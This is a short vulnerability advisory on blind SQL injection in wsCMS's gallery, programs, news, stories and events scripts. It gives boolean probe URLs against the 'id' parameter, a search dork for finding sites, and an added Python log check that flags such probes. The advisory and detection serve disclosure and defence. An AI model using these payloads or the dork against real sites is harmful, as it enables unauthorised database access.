wsCMS Blind SQL Injection Vuln


[o] wsCMS Blind SQL Injection Vulnerability

Software : wsCMS
Vendor : http://www.websolutions.ca/
Author : NoGe


[o] Vulnerable files
gallery.php
programs.php
news.php
stories.php
events.php

All of the files above are affected through the "id" parameter.


[o] Exploit
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/gallery.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/programs.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/news.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/stories.php?id=1 and substring(@@version,1,1)=5

http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=4
http://localhost/[path]/events.php?id=1 and substring(@@version,1,1)=5
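
[o] Detection (added example, not part of the original advisory and not vendor code)
A log check that flags requests to the five listed scripts whose "id" value is not a plain integer, and labels the true/false request pairs of the kind shown above. The Apache common/combined log format, the sample lines and the function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Scripts the advisory lists as affected through the "id" parameter.
SCRIPTS = {"gallery.php", "programs.php", "news.php", "stories.php", "events.php"}
# Client address and request target from an Apache common/combined log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# Tokens of the kind used in the probes above; a heuristic, not a SQL parser.
SQL_HINT = re.compile(r"@@|\b(?:and|or|union|select|substring|sleep|benchmark)\b", re.I)

# Constructed sample lines (documentation addresses, made-up paths and times).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2010:13:55:36 +0000] "GET /site/news.php?id=1%20and%20substring(@@version,1,1)=4 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [10/Oct/2010:13:55:37 +0000] "GET /site/news.php?id=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 812',
    '203.0.113.9 - - [10/Oct/2010:13:56:01 +0000] "GET /site/events.php?id=12 HTTP/1.1" 200 4410',
    '203.0.113.9 - - [10/Oct/2010:13:56:09 +0000] "GET /site/gallery.php?id=12abc HTTP/1.1" 200 300',
]

def suspicious_ids(log_lines):
    """Map (client, script) to the non-integer id values that client sent."""
    hits = defaultdict(list)
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        script = url.path.rsplit("/", 1)[-1]
        if script not in SCRIPTS:
            continue
        # parse_qs percent-decodes values and turns "+" into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits[(client, script)].append(value)
    return dict(hits)

def classify(values):
    """Label one client's values for one script."""
    if not any(SQL_HINT.search(v) for v in values):
        return "malformed-id"
    # A true/false pair differs only in the number being compared.
    shapes = {re.sub(r"[0-9]+", "N", v) for v in values}
    return "boolean-probe" if len(values) > 1 and len(shapes) == 1 else "sql-tokens"

if __name__ == "__main__":
    for (client, script), values in suspicious_ids(SAMPLE_LOG).items():
        print(client, script, classify(values), values)
```

The same integer-only rule, enforced in the application before the value reaches a query, is the input check these scripts are missing.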


[o] Dork
"Powered by wsCMS"


[o] Note
This is a private script.

